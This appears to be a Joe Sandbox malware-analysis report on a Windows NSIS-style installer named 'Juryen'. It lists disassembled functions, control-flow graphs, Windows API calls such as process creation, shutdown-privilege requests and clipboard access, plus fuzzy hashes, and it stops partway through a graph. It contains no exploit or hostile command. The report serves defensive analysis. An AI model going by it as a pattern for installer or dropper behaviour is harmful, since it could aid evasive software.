                                                                    control_flow_graph 139 40351c-40356e SetErrorMode GetVersionExW 140 403570-4035a0 GetVersionExW 139->140 141 4035a8-4035ad 139->141 140->141 142 4035b5-4035f7 141->142 143 4035af 141->143 144 4035f9-403601 call 406935 142->144 145 40360a 142->145 143->142 144->145 151 403603 144->151 146 40360f-403623 call 4068c5 lstrlenA 145->146 152 403625-403641 call 406935 * 3 146->152 151->145 159 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 152->159 160 403643-403649 152->160 167 4036b8-4036ba 159->167 168 4036bf-4036d3 call 405e3d CharNextW 159->168 160->159 165 40364b 160->165 165->159 167->168 171 4037ce-4037d4 168->171 172 4036d8-4036de 171->172 173 4037da 171->173 175 4036e0-4036e5 172->175 176 4036e7-4036ee 172->176 174 4037ee-403808 GetTempPathW call 4034eb 173->174 183 403860-40387a DeleteFileW call 4030a2 174->183 184 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 174->184 175->175 175->176 178 4036f0-4036f5 176->178 179 4036f6-4036fa 176->179 178->179 181 403700-403706 179->181 182 4037bb-4037ca call 405e3d 179->182 186 403720-403759 181->186 187 403708-40370f 181->187 182->171 200 4037cc-4037cd 182->200 205 403880-403886 183->205 206 403a67-403a77 call 403b39 OleUninitialize 183->206 184->183 203 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 184->203 190 403776-4037b0 186->190 191 40375b-403760 186->191 188 403711-403714 187->188 189 403716 187->189 188->186 188->189 189->186 197 4037b2-4037b6 190->197 198 4037b8-4037ba 190->198 191->190 195 403762-40376a 191->195 201 403771 195->201 202 40376c-40376f 195->202 197->198 204 4037dc-4037e9 call 406541 197->204 198->182 200->171 201->190 202->190 202->201 203->183 203->206 204->174 210 40388c-403897 call 405e3d 205->210 211 40391f-40392f call 403c13 205->211 218 403a79-403a89 call 405ba1 ExitProcess 206->218 219 403a9d-403aa3 206->219 220 4038e5-4038ef 210->220 221 403899-4038ce 210->221 211->206 222 403b21-403b29 219->222 223 403aa5-403abb GetCurrentProcess OpenProcessToken 219->223 229 4038f1-4038ff call 405f18 220->229 230 403934-40395a call 405b0c lstrlenW call 406541 220->230 226 4038d0-4038d4 221->226 231 403b2b 222->231 232 403b2f-403b33 ExitProcess 222->232 227 403af1-403aff call 406935 223->227 228 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 223->228 233 4038d6-4038db 226->233 234 4038dd-4038e1 226->234 243 403b01-403b0b 227->243 244 403b0d-403b18 ExitWindowsEx 227->244 228->227 229->206 245 403905-40391b call 406541 * 2 229->245 249 40396b-403983 230->249 250 40395c-403966 call 406541 230->250 231->232 233->234 238 4038e3 233->238 234->226 234->238 238->220 243->244 247 403b1a-403b1c call 40140b 243->247 244->222 244->247 245->211 247->222 255 403988-40398c 249->255 250->249 257 403991-4039bb wsprintfW call 40657e 255->257 261 4039c4 call 405aef 257->261 262 4039bd-4039c2 call 405a95 257->262 266 4039c9-4039cb 261->266 262->266 267 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 266->267 268 4039cd-4039d7 GetFileAttributesW 266->268 276 403a65 267->276 277 403a28-403a49 call 406301 call 40657e call 405b24 267->277 269 4039f8-403a03 268->269 270 4039d9-4039e2 DeleteFileW 268->270 269->255 273 403a05 269->273 270->269 272 4039e4-4039f6 call 405c4d 270->272 272->257 272->269 273->206 276->206 285 403a4b-403a55 277->285 286 403a8f-403a9b CloseHandle 277->286 285->276 287 403a57-403a5f call 40689e 285->287 286->276 287->257 287->276
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32 ref: 0040353F
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                    • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                    • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                    • GetTempPathW.KERNEL32(00000400,00436800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                    • GetWindowsDirectoryW.KERNEL32(00436800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                    • lstrcatW.KERNEL32(00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                    • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                    • lstrcatW.KERNEL32(00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00436800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                    • DeleteFileW.KERNEL32(00436000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                    • lstrlenW.KERNEL32(00436800,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                    • wsprintfW.USER32 ref: 0040399B
                                                                    • GetFileAttributesW.KERNEL32(0042C800,00436800), ref: 004039CE
                                                                    • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                    • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403A08
                                                                      • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                    • CopyFileW.KERNEL32(00437800,0042C800,00000001,00436800,00000000), ref: 00403A1E
                                                                      • Part of subcall function 00405B24: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                      • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                      • Part of subcall function 0040689E: FindFirstFileW.KERNEL32(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,00436800,00405C6D,?,771B3420,00436800), ref: 004068A9
                                                                      • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                    • ExitProcess.KERNEL32 ref: 00403A89
                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                    • ExitProcess.KERNEL32 ref: 00403B33
                                                                      • Part of subcall function 00405AEF: CreateDirectoryW.KERNEL32(?,00000000,0040350F,00436800,00436800,00436800,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                    • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                    • API String ID: 1813718867-2779336553
                                                                    • Opcode ID: 2207ca5d112a9a3364a8ba5a27e8e35ca5960dc45a954e7d111bf56b8d3c545f
                                                                    • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                    • Opcode Fuzzy Hash: 2207ca5d112a9a3364a8ba5a27e8e35ca5960dc45a954e7d111bf56b8d3c545f
                                                                    • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                                                    Function 00405C4D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,771B3420,00436800,00434000), ref: 00405C76
                                                                    • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CBE
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CE1
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CE7
                                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CF7
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                    • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: \*.*
                                                                    • API String ID: 2035342205-1173974218
                                                                    • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                    • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                                    Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                    • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                    Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,00436800,00405C6D,?,771B3420,00436800), ref: 004068A9
                                                                    • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: X_B
                                                                    • API String ID: 2295610775-941606717
                                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                                    Function 1F7560E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1F7561DA
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 1F7561E4
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1F7561F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: b600e752aa79a83286881f5113a8bcd596e694c7fba1240810562596ee2aa62b
                                                                    • Instruction ID: bc02963713d698f9d35e1527965f1be610fef31b4db8b0a35db460445d4498af
                                                                    • Opcode Fuzzy Hash: b600e752aa79a83286881f5113a8bcd596e694c7fba1240810562596ee2aa62b
                                                                    • Instruction Fuzzy Hash: 4A31B5B490132C9BCB61DF64D98878DBBB4AF48320F5041DAE81CA7260E730AB95CF45
                                                                    Function 1F754AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000,00000001,1F752082,1F762108,0000000C,1F751F3A,?), ref: 1F754AD5
                                                                    • TerminateProcess.KERNEL32(00000000,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000,00000001,1F752082,1F762108,0000000C,1F751F3A,?), ref: 1F754ADC
                                                                    • ExitProcess.KERNEL32 ref: 1F754AEE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 3912071bd6e728b5a9ccbfd875e46586e413ab05e75a96799ad187f74eb56368
                                                                    • Instruction ID: be438933095a50664fa0f403d53532919025bca00bb7275a326fc9f28e204a94
                                                                    • Opcode Fuzzy Hash: 3912071bd6e728b5a9ccbfd875e46586e413ab05e75a96799ad187f74eb56368
                                                                    • Instruction Fuzzy Hash: 3FE0B636204258AFCF416FA4DD68E893B6AEF84361B104015F9098B531EB36E967CA58
                                                                    Function 1F75724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 0d9b6ad725c94599640a125f5931d62c793a25078af9c7ff042b1e1089414d14
                                                                    • Instruction ID: d1b3d0ffdad628da1fd3be8610a7e87dfe73cc7b5c215b97f6f7e4cc7414c6ff
                                                                    • Opcode Fuzzy Hash: 0d9b6ad725c94599640a125f5931d62c793a25078af9c7ff042b1e1089414d14
                                                                    • Instruction Fuzzy Hash: 43A012302002138FD3804E30428924C36AC66881B07000016D40CC0150E72184328600
                                                                    Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 290 405705-405720 291 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 290->291 292 4058af-4058b6 290->292 313 40580b-40580e 291->313 314 4057ef-405809 SendMessageW * 2 291->314 294 4058e0-4058ed 292->294 295 4058b8-4058da GetDlgItem CreateThread CloseHandle 292->295 297 40590b-405915 294->297 298 4058ef-4058f5 294->298 295->294 302 405917-40591d 297->302 303 40596b-40596f 297->303 300 405930-405939 call 404527 298->300 301 4058f7-405906 ShowWindow * 2 call 4044f5 298->301 310 40593e-405942 300->310 301->297 308 405945-405955 ShowWindow 302->308 309 40591f-40592b call 404499 302->309 303->300 306 405971-405977 303->306 306->300 315 405979-40598c SendMessageW 306->315 311 405965-405966 call 404499 308->311 312 405957-405960 call 4055c6 308->312 309->300 311->303 312->311 319 405810-40581c SendMessageW 313->319 320 40581e-405835 call 4044c0 313->320 314->313 321 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 315->321 322 405a8e-405a90 315->322 319->320 329 405837-40584b ShowWindow 320->329 330 40586b-40588c GetDlgItem SendMessageW 320->330 327 4059d2-4059e7 TrackPopupMenu 321->327 328 4059bf-4059cf GetWindowRect 321->328 322->310 327->322 331 4059ed-405a04 327->331 328->327 332 40585a 329->332 333 40584d-405858 ShowWindow 329->333 330->322 334 405892-4058aa SendMessageW * 2 330->334 335 405a09-405a24 SendMessageW 331->335 336 405860-405866 call 4044f5 332->336 333->336 334->322 335->335 337 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 335->337 336->330 339 405a4b-405a72 SendMessageW 337->339 339->339 340 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 339->340 340->322
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                    • GetClientRect.USER32(?,?), ref: 004057AF
                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004058DA
                                                                    • ShowWindow.USER32(00000000), ref: 004058FE
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                    • ShowWindow.USER32(00000008), ref: 0040594D
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                    • CreatePopupMenu.USER32 ref: 00405992
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                    • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                    • EmptyClipboard.USER32 ref: 00405A2D
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                    • CloseClipboard.USER32 ref: 00405A88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                    • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
                                                                    Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 341 404f2d-404f79 GetDlgItem * 2 342 4051a4-4051ab 341->342 343 404f7f-405017 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 341->343 344 4051ad-4051bd 342->344 345 4051bf 342->345 346 405026-40502d DeleteObject 343->346 347 405019-405024 SendMessageW 343->347 348 4051c2-4051cb 344->348 345->348 349 40502f-405037 346->349 347->346 350 4051d6-4051dc 348->350 351 4051cd-4051d0 348->351 352 405060-405064 349->352 353 405039-40503c 349->353 355 4051eb-4051f2 350->355 356 4051de-4051e5 350->356 351->350 354 4052ba-4052c1 351->354 352->349 359 405066-405096 call 4044c0 * 2 352->359 357 405041-40505e call 40657e SendMessageW * 2 353->357 358 40503e 353->358 360 405332-40533a 354->360 361 4052c3-4052c9 354->361 362 4051f4-4051f7 355->362 363 405267-40526a 355->363 356->354 356->355 357->352 358->357 395 405166-405179 GetWindowLongW SetWindowLongW 359->395 396 40509c-4050a2 359->396 370 405344-40534b 360->370 371 40533c-405342 SendMessageW 360->371 367 405525-405537 call 404527 361->367 368 4052cf-4052d9 361->368 372 405202-405217 call 404e7b 362->372 373 4051f9-405200 362->373 363->354 369 40526c-405276 363->369 368->367 376 4052df-4052ee SendMessageW 368->376 377 405286-405290 369->377 378 405278-405284 SendMessageW 369->378 380 40534d-405354 370->380 381 40537f-405386 370->381 371->370 372->363 394 405219-40522a 372->394 373->363 373->372 376->367 386 4052f4-405305 SendMessageW 376->386 377->354 387 405292-40529c 377->387 378->377 389 405356-405357 ImageList_Destroy 380->389 390 40535d-405364 380->390 384 4054e7-4054ee 381->384 385 40538c-405398 call 4011ef 381->385 384->367 400 4054f0-4054f7 384->400 413 4053a8-4053ab 385->413 414 40539a-40539d 385->414 398 405307-40530d 386->398 399 40530f-405311 386->399 401 4052ad-4052b7 387->401 402 40529e-4052ab 387->402 389->390 392 405366-405367 GlobalFree 390->392 393 40536d-405379 390->393 392->393 393->381 394->363 403 40522c-40522e 394->403 408 40517f-405182 395->408 404 4050a5-4050ab 396->404 398->399 406 405312-40532b call 401299 SendMessageW 398->406 399->406 400->367 407 4054f9-405523 ShowWindow GetDlgItem ShowWindow 400->407 401->354 402->354 409 405230-405237 403->409 410 405241 403->410 411 4050b1-4050dc 404->411 412 405148-40515b 404->412 406->360 407->367 416 405184-405197 ShowWindow call 4044f5 408->416 417 40519c-40519f call 4044f5 408->417 419 405239-40523b 409->419 420 40523d-40523f 409->420 421 405244-405260 call 40117d 410->421 422 405118-40511a 411->422 423 4050de-405116 SendMessageW 411->423 412->404 427 405161-405164 412->427 428 4053ec-405410 call 4011ef 413->428 429 4053ad-4053c6 call 4012e2 call 401299 413->429 424 4053a0-4053a3 call 404efb 414->424 425 40539f 414->425 416->367 417->342 419->421 420->421 421->363 434 405130-405145 SendMessageW 422->434 435 40511c-40512e SendMessageW 422->435 423->412 424->413 425->424 427->395 427->408 441 4054b2-4054bb 428->441 442 405416 428->442 448 4053d6-4053e5 SendMessageW 429->448 449 4053c8-4053ce 429->449 434->412 435->412 444 4054c9-4054d1 441->444 445 4054bd-4054c3 InvalidateRect 441->445 446 405419-405424 442->446 444->384 452 4054d3-4054e2 call 404e4e call 404e36 444->452 445->444 450 405426-405435 446->450 451 40549a-4054ac 446->451 448->428 453 4053d0 449->453 454 4053d1-4053d4 449->454 456 405437-405444 